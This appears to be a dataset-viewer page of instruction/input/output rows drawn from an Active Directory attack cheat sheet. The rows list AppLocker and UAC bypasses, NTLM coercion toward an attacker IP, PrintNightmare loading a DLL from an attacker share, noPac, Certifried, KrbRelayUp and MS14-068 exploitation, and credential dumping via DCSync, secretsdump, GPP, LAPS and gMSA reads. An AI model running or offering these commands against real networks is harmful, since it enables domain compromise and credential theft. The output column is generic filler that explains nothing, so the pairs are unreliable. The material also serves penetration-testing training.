instruction stringclasses 270
values | input stringlengths 3 214 | output stringclasses 297
values |
|---|---|---|
Bypass Applocker | Get-Applocker infos | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | Get-ChildItem -Path HKLM:\SOFTWARE\Policies \Microsoft\Windows\SrpV2\Exe (dll/msi/...) | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | files in writables paths | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | C:\Windows\Temp | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | C:\Windows\Tasks | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | installutil.exe /logfile= /LogToConsole=false /U C:\runme.exe | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | mshta.exe my.hta | Note or procedural step under 'Bypass Applocker'. |
Bypass Applocker | MsBuild.exe pshell.xml | Note or procedural step under 'Bypass Applocker'. |
UAC bypass | Fodhelper.exe | Note or procedural step under 'UAC bypass'. |
UAC bypass | wsreset.exe | Note or procedural step under 'UAC bypass'. |
UAC bypass | msdt.exe | Note or procedural step under 'UAC bypass'. |
Auto Enum | winPEASany_ofs.exe | Note or procedural step under 'Auto Enum'. |
Auto Enum | .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended" | Note or procedural step under 'Auto Enum'. |
Search files | findstr /si 'pass' *.txt *.xml *.docx *.ini | Note or procedural step under 'Search files'. |
Exploit | SMBGhost CVE-2020-0796 | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Exploit | CVE-2021-36934 (HiveNightmare/SeriousSAM) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
Exploit | vssadmin list shadows | Note or procedural step under 'Exploit'. |
Webdav | open file <file>.searchConnector-ms | Note or procedural step under 'Webdav'. |
Webdav | dnstool.py -u <domain>\<user> -p <pass> --record 'attacker' --action add --data <ip_attacker> <dc_ip> | Note or procedural step under 'Webdav'. |
Webdav | petitpotam.py -u '<user>' -p <pass> -d '<domain>' "attacker@80/random.txt" <ip> | Note or procedural step under 'Webdav'. |
Kerberos Relay | KrbRelayUp.exe relay -Domain <domain> -CreateNewComputerAccount -ComputerName <computer$> -ComputerPassword <password> | Note or procedural step under 'Kerberos Relay'. |
Kerberos Relay | KrbRelayUp.exe spawn -m rbcd -d <domain> -dc <dc> -cn <computer_name>-cp <omputer_pass> | Note or procedural step under 'Kerberos Relay'. |
From Service account (SEImpersonate) | RoguePatato | Note or procedural step under 'From Service account (SEImpersonate)'. |
From Service account (SEImpersonate) | GodPotato | Note or procedural step under 'From Service account (SEImpersonate)'. |
From Service account (SEImpersonate) | PrintSpoofer | Note or procedural step under 'From Service account (SEImpersonate)'. |
From Service account (SEImpersonate) | RemotePotato0 | Note or procedural step under 'From Service account (SEImpersonate)'. |
MS14-068 | findSMB2UPTime.py <ip> | Note or procedural step under 'MS14-068'. |
MS14-068 | ms14-068.py -u <user>@<domain> -p <password> -s <user_sid> -d <dc_fqdn> | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
MS14-068 | msf> use auxiliary/admin/kerberos/ms14_068_kerberos_checksum | Tool or command referenced under 'MS14-068'. |
MS14-068 | goldenPac.py -dc-ip <dc_ip> <domain>/<user>:<password>@target | Note or procedural step under 'MS14-068'. |
GPP MS14-025 | msf> use auxiliary/scanner/smb/smb_enum_gpp | Tool or command referenced under 'GPP MS14-025'. |
GPP MS14-025 | findstr /S /I cpassword \\<domain_fqdn>\sysvol\<domain_fqdn>\policies\*.xml | Note or procedural step under 'GPP MS14-025'. |
GPP MS14-025 | Get-GPPPassword.py <domain>/<user>:<password>@<dc_fqdn> | Note or procedural step under 'GPP MS14-025'. |
PrivExchange (CVE-2019-0724, CVE-2019-0686) | privexchange.py -ah <attacker_ip> <exchange_host> -u <user> -d <domain> -p <password> | Note or procedural step under 'PrivExchange (CVE-2019-0724, CVE-2019-0686)'. |
noPac (CVE-2021-42287, CVE-2021-42278) | nxc smb <ip> -u 'user' -p 'pass' -M nopac #scan | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
noPac (CVE-2021-42287, CVE-2021-42278) | noPac.exe -domain <domain> -user <user> -pass <password> /dc <dc_fqdn> /mAccount <machine_account> /mPassword <machine_password> /service cifs /ptt | Note or procedural step under 'noPac (CVE-2021-42287, CVE-2021-42278)'. |
PrintNightmare (CVE-2021-1675, CVE-2021-34527) | nxc smb <ip> -u 'user' -p 'pass' -M printnightmare #scan | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
PrintNightmare (CVE-2021-1675, CVE-2021-34527) | printnightmare.py -dll '\\<attacker_ip>\smb\add_user.dll' '<user>:<password>@<ip> | Note or procedural step under 'PrintNightmare (CVE-2021-1675, CVE-2021-34527)'. |
Certifried (CVE-2022-26923) | Create account | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
Certifried (CVE-2022-26923) | certipy account create -u <user>@<domain> -p '<password>' -user 'certifriedpc' -pass 'certifriedpass' -dns '<fqdn_dc>' | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
Certifried (CVE-2022-26923) | Request | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
Certifried (CVE-2022-26923) | certipy req -u 'certifriedpc$'@<domain> -p 'certifriedpass' -target <ca_fqdn> -ca <ca_name> -template Machine | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
Certifried (CVE-2022-26923) | Authentication | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
Certifried (CVE-2022-26923) | certipy auth -pfx <pfx_file> -username '<dc>$' -domain <domain> -dc-ip <dc_ip> | Note or procedural step under 'Certifried (CVE-2022-26923)'. |
ProxyNotShell (CVE-2022-41040, CVE-2022-41082) | poc_aug3.py <host> <username> <password> <command> | Note or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'. |
ProxyNotShell (CVE-2022-41040, CVE-2022-41082) | ACLs/ACEs permissions | Note or procedural step under 'ProxyNotShell (CVE-2022-41040, CVE-2022-41082)'. |
Dcsync | Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts | Note or procedural step under 'Dcsync'. |
Dcsync | mimikatz lsadump::dcsync /domain:<target_domain> /user:<target_domain>\administrator | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Dcsync | secretsdump.py '<domain>'/'<user>':'<password>'@'<domain_controller>' | Credential extraction or secrets dumping referenced; handle in lab and follow legal constraints. |
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS | Shadow Credentials | Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'. |
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS | certipy shadow auto '-u <user>@<domain>' -p <password> -account '<target_account>' | Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'. |
Can change msDS-KeyCredentialLInk (Generic Write) + ADCS | pywhisker.py -d "FQDN_DOMAIN" -u "user1" -p "CERTIFICATE_PASSWORD" --target "TARGET_SAMNAME" --action "list" | Note or procedural step under 'Can change msDS-KeyCredentialLInk (Generic Write) + ADCS'. |
On Group | GenericAll/GenericWrite/Self/Add Extended Rights | Note or procedural step under 'On Group'. |
On Group | Add member to the group | Note or procedural step under 'On Group'. |
On Group | Write Owner | Note or procedural step under 'On Group'. |
On Group | Grant Ownership | Note or procedural step under 'On Group'. |
On Group | WriteDACL + WriteOwner | Note or procedural step under 'On Group'. |
On Group | Grant rights | Note or procedural step under 'On Group'. |
On Group | Give yourself generic all | Note or procedural step under 'On Group'. |
On Computer | GenericAll / GenericWrite | Note or procedural step under 'On Computer'. |
On Computer | msDs-AllowedToActOnBehalf | Note or procedural step under 'On Computer'. |
On Computer | add Key Credentials | Note or procedural step under 'On Computer'. |
On User | GenericAll / GenericWrite | Note or procedural step under 'On User'. |
On User | Change password | Note or procedural step under 'On User'. |
On User | add SPN (target kerberoasting) | Note or procedural step under 'On User'. |
On User | add key credentials | Note or procedural step under 'On User'. |
On User | login script | Note or procedural step under 'On User'. |
On User | ForceChangePassword | Note or procedural step under 'On User'. |
On User | net user <user> <password> /domain | Note or procedural step under 'On User'. |
On OU | Write Dacl | Note or procedural step under 'On OU'. |
On OU | ACE Inheritance | Note or procedural step under 'On OU'. |
On OU | Grant rights | Note or procedural step under 'On OU'. |
On OU | GenericAll / GenericWrite / Manage Group Policy Links | Note or procedural step under 'On OU'. |
On OU | OUned.py --config config.ini | Note or procedural step under 'On OU'. |
ReadGMSAPassword | gMSADumper.py -u '<user>' -p '<password>' -d '<domain>' | Note or procedural step under 'ReadGMSAPassword'. |
ReadGMSAPassword | nxc ldap <ip> -u <user> -p <pass> --gmsa | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
ReadGMSAPassword | ldeep ldap -u <user> -p <password> -d <domain> -s ldaps://<dc_ip> gmsa | Note or procedural step under 'ReadGMSAPassword'. |
Get LAPS passwords | Who can read LAPS | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | MATCH p=(g:Base)-[:ReadLAPSPassword]->(c:Computer) RETURN p | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | Read LAPS | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | Get-LapsADPassword -DomainController <ip_dc> -Credential <domain>\<login> | Format-Table -AutoSize | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | ldeep ldap -u <user> -p <password> -d <domain> -s ldap://<dc_ip> laps | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}} | Note or procedural step under 'Get LAPS passwords'. |
Get LAPS passwords | nxc ldap <dc_ip> -d <domain> -u <user> -p <password> --module laps | NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes. |
Get LAPS passwords | msf> use post/windows/gather/credentials/enum_laps | Tool or command referenced under 'Get LAPS passwords'. |
GPO | Who can control GPOs | Note or procedural step under 'GPO'. |
GPO | MATCH p=((n:Base)-[]->(gp:GPO)) RETURN p | Note or procedural step under 'GPO'. |
GPO | SID of principals that can create new GPOs in the domain | Note or procedural step under 'GPO'. |
GPO | Get-DomainObjectAcl -SearchBase "CN=Policies,CN=System,DC=blah,DC=com" -ResolveGUIDs | ? { $_.ObjectAceType -eq "Group-Policy-Container" } | select ObjectDN, ActiveDirectoryRights, SecurityIdentifier | fl | Note or procedural step under 'GPO'. |
GPO | Return the principals that can write to the GP-Link attribute on OUs | Note or procedural step under 'GPO'. |
GPO | Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ObjectAceType -eq "GP-Link" -and $_.ActiveDirectoryRights -match "WriteProperty" } | select ObjectDN, SecurityIdentifier | fl | Note or procedural step under 'GPO'. |
GPO | Generic Write on GPO | Note or procedural step under 'GPO'. |
GPO | Abuse GPO | Note or procedural step under 'GPO'. |
DNS Admin | DNSadmins abuse (CVE-2021-40469) | Reference to a known vulnerability or advisory; consult vendor advisories and patching guidance. |
DNS Admin | dnscmd.exe /config /serverlevelplugindll <\\path\to\dll> # need a dnsadmin user | Note or procedural step under 'DNS Admin'. |
DNS Admin | sc \\DNSServer stop dns sc \\DNSServer start dns | Note or procedural step under 'DNS Admin'. |
Find delegation | findDelegation.py "<domain>"/"<user>":"<password>" | Note or procedural step under 'Find delegation'. |
Find delegation | With BloodHound | Note or procedural step under 'Find delegation'. |
Find delegation | Unconstrained | Note or procedural step under 'Find delegation'. |
Find delegation | MATCH (c:Computer {unconstraineddelegation:true}) RETURN c | Note or procedural step under 'Find delegation'. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.